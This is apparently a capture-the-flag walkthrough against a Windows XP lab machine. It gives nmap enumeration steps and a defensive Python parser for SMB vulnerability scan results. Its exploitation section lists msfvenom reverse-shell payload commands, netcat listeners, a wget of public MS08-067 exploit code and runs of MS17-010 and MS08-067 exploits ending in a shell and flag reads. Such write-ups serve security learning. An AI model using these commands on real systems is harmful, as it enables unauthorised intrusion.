[Enumeration]
1. Port scan
nmap -Pn <ip>
2. Port scan with high port number
nmap -Pn -p- <ip>
No high ports found.
3. OS detection, version detection, script scanning, and traceroute
nmap -A <ip>
This machine is Windows XP.
4. Samba scan
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>
Nothing much.
5. Vulnerability scan
nmap --script vuln <ip>
There are 2 exploits that I can use: ms08-067 and ms17-010.
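As an added example from the defender's side of this step (not part of the original write-up): a small Python script that parses the XML report written by nmap --script vuln -oX scan.xml <ip> and lists hosts whose smb-vuln-* scripts report a vulnerable state, so they can be queued for patching. The sample XML, IP addresses and table keys are constructed; the element layout follows nmap's vulns library output.

```python
"""Triage nmap '--script vuln' XML output (-oX) for SMB findings such as
smb-vuln-ms08-067 and smb-vuln-ms17-010, so hosts can be queued for patching."""
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample of nmap XML output (not a real scan); a real report is
# read from the file written by 'nmap --script vuln -oX scan.xml <ip>'.
SAMPLE_XML = """<nmaprun scanner="nmap">
  <host>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE"><table key="ms17-010"><elem key="state">VULNERABLE</elem></table></script>
      <script id="smb-vuln-ms08-067" output="VULNERABLE"><table key="ms08-067"><elem key="state">VULNERABLE</elem></table></script>
    </hostscript>
  </host>
  <host>
    <address addr="10.0.0.6" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="NOT VULNERABLE"><table key="ms17-010"><elem key="state">NOT VULNERABLE</elem></table></script>
    </hostscript>
  </host>
</nmaprun>"""

def is_vulnerable_state(state: str) -> bool:
    """True for vulns-library states like 'VULNERABLE', 'VULNERABLE (Exploitable)'
    or 'LIKELY VULNERABLE'; 'NOT VULNERABLE' contains the word, so no substring test."""
    s = state.strip().upper()
    return s.startswith("VULNERABLE") or s.startswith("LIKELY VULNERABLE")

def vulnerable_smb_hosts(xml_text: str) -> Dict[str, List[str]]:
    """Return {ipv4: [smb-vuln-* script ids reporting a vulnerable state]}."""
    findings: Dict[str, List[str]] = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for script in host.iter("script"):
            sid = script.get("id", "")
            if not sid.startswith("smb-vuln-"):
                continue
            states = [e.text or "" for e in script.iter("elem") if e.get("key") == "state"]
            if any(is_vulnerable_state(s) for s in states):
                findings.setdefault(addr.get("addr"), []).append(sid)
    return findings

if __name__ == "__main__":
    for ip, ids in vulnerable_smb_hosts(SAMPLE_XML).items():
        print(f"{ip}: patch needed for {', '.join(ids)}")
```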
[Exploitation]
There are 2 exploits that I'm gonna use:
- ms08-067
- ms17-010
I'm familiar with ms17-010 (EternalBlue). I'll try this first.
1. ms17-010
I use this script from https://github.com/helviojunior/MS17-010
I’ll use ‘send_and_execute.py’.
First, create the reverse shell executable
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe
Create listener
nc -lvp 1234
Run the script
python send_and_execute.py <target ip> <shell path>
Back to listener, now I have a shell.
Find user.txt
dir user.txt /s /b
cd \Documents and Settings\john\Desktop
type user.txt
cd \
dir *root.txt* /s /b
cd \Documents and Settings\Administrator\Desktop
type root.txt
2. ms08-067
Search exploits
searchsploit ms08-067
Copy the exploit to working directory
searchsploit -m 40279
Review the code
Generate new shellcode. In my case, I will use netcat as a listener.
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python > shellcode.txt
Copy generated shellcode to the script
Try to run the script
python 40279.py
python 40279.py 1 <ip>
python 40279.py 2 <ip>
Both options failed; maybe this machine is WinXP SP3. I have to find another way.
Let's search ms08-067 with Google. I came across this, thanks to andyacer: https://github.com/andyacer/ms08_067
wget https://raw.githubusercontent.com/andyacer/ms08_067/master/ms08_067_2018.py
Generate shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -a x86 --platform windows > shellcode_python.txt
Replace shellcode in the script
Test command
python ms08_067_2018.py
Create listener
nc -lvp 1234
Since I suspect this machine is WinXP SP3, I use this command.
python ms08_067_2018.py <ip> 6 445
Back to listener, now I have a shell.